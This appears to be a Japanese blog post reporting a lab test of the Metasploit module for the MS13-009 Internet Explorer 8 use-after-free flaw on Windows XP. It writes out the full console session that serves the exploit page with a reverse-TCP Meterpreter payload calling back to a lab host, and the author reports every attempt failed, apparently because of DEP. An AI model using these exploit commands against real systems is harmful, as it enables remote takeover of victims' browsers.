使うモジュールはms13_009_ie_slayoutrun_uafで作者のレポートはここ。
ちなみにこのモジュールは「SP3 with Internet Explorer 8」しか対応していないとのこと。
metasploit を起動して必要なパラメータを入力する。
msf > use exploit/windows/browser/ms13_009_ie_slayoutrun_uaf msf exploit(ms13_009_ie_slayoutrun_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms13_009_ie_slayoutrun_uaf) > set SRVHOST 10.0.0.80 SRVHOST => 10.0.0.80 msf exploit(ms13_009_ie_slayoutrun_uaf) > set LHOST 10.0.0.80 LHOST => 10.0.0.80 msf exploit(ms13_009_ie_slayoutrun_uaf) > msf exploit(ms13_009_ie_slayoutrun_uaf) > set URIPATH ms13_009 URIPATH => ms13_009 msf exploit(ms13_009_ie_slayoutrun_uaf) > exploit [*] Exploit running as background job. [*] Started reverse handler on 10.0.0.80:4444 msf exploit(ms13_009_ie_slayoutrun_uaf) > [*] Using URL: http://10.0.0.80:8080/ms13_009 [*] Server started.
このモジュールは XP sp3 の IE8 に対応しているが、試しに sp2 の IE6 でアクセスしてみる。
msf exploit(ms13_009_ie_slayoutrun_uaf) > [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Requesting: /ms13_009 [-] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Browser not supported, sending 404: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
404 を返して終了。次は sp3 の IE8 でアクセスしてみる。
msf exploit(ms13_009_ie_slayoutrun_uaf) > [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Requesting: /ms13_009 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Target selected as: IE 8 on Windows XP SP3 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Using msvcrt ROP [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Sending HTML... [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Requesting: /ms13_009 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Target selected as: IE 8 on Windows XP SP3 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Using msvcrt ROP [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Sending HTML... [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Requesting: /ms13_009 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Target selected as: IE 8 on Windows XP SP3 [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Using msvcrt ROP [*] 10.0.0.100 ms13_009_ie_slayoutrun_uaf - Sending HTML... msf exploit(ms13_009_ie_slayoutrun_uaf) > show sessions Active sessions =============== No active sessions. msf exploit(ms13_009_ie_slayoutrun_uaf) >
数回実行したがすべて失敗した。
DEP が有効に働いて失敗した模様。
ということでうまくいかなかった報告。
0 件のコメント:
コメントを投稿